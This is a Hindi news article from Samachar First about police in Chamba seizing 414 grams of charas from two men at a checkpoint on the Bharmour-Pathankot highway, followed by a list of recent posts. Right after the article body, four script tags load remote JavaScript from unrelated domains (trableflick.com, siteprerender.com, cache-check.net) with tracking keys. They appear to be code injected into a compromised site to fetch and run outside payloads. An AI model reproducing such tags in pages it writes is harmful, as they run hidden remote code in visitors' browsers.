चंबाः गुप्त सूचना के आधार पर पुलिस ने भरमौर-पठानकोट NH पर 2 लोगों से बरामद की चरस

<p>जिला चंबा में दो लोगों से चरस बरामद होने का मामला सामने आया है। यहां पुलिस ने गुप्त सूचना के अधार पर मंगलवार सुबह भरमौर-पठानकोट एनएच पर करियां के पास नाका लगाया हुआ था। इस दौरान दो लोगों से 414 ग्राम चरस बरामद की गई। चरस के साथ पकड़े गए आरोपितों की पहचान मान सिंह उर्फ बिट्टू निवासी कूंर और काहन सिंह निवासी रजेरा के तौर पर की गई है। पुलिस को बीते दिनों सूचना मिली थी कि दोनों मंगलवार सुबह चरस की खेप लेकर चंबा की तरफ आएंगे, जिस आधार पर पुलिस ने करियां के पास नाकाबंदी की।</p>

<p>पुलिस सुबह साढ़े पांच बजे गश्त पर थी तब दो लोग बाइक पर सवार होकर आ रहे थे। दोनों पुलिस को देखकर हड़बड़ा गए और बाइक चला रहे कान सिंह पुलिस को देख कर भागने का प्रयास करने लगा। जिस पर पुलिस ने मुस्तैदी दिखाते हुए दोनों को बाइक सहित पकड़ा और उनके बैग की तलाशी ली। इस दौरान उनके बैग से 414 ग्राम चरस बरामद की गई। पुलिस ने चरस तस्करी के आरोप में दोनों को गिरफ्तार कर लिया है।</p>

<p>चंबा डीएसपी अजय कपूर ने बताया कि जिला में चरस तस्करों के खिलाफ पुलिस ने विशेष अभियान छेड़ा है। इसके तहत कार्रवाई की जा रही है। गुप्त सूचना के आधार पर भी पुलिस जगह-जगह दुर्गम क्षेत्रों में नाकेबंदी कर रही है। उन्होंने बताया चरस तस्करी करने वालों को बख्शा नहीं जाएगा। पुलिस का अभियान आगे भी जारी रहेगा। वहीं, एसपी ने कहा कि दोनों को जेल में बंद कर दिया गया है। आगामी कार्रवाई की जा रही है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1600164008279″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

9 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

10 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

10 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

10 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

11 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

11 hours ago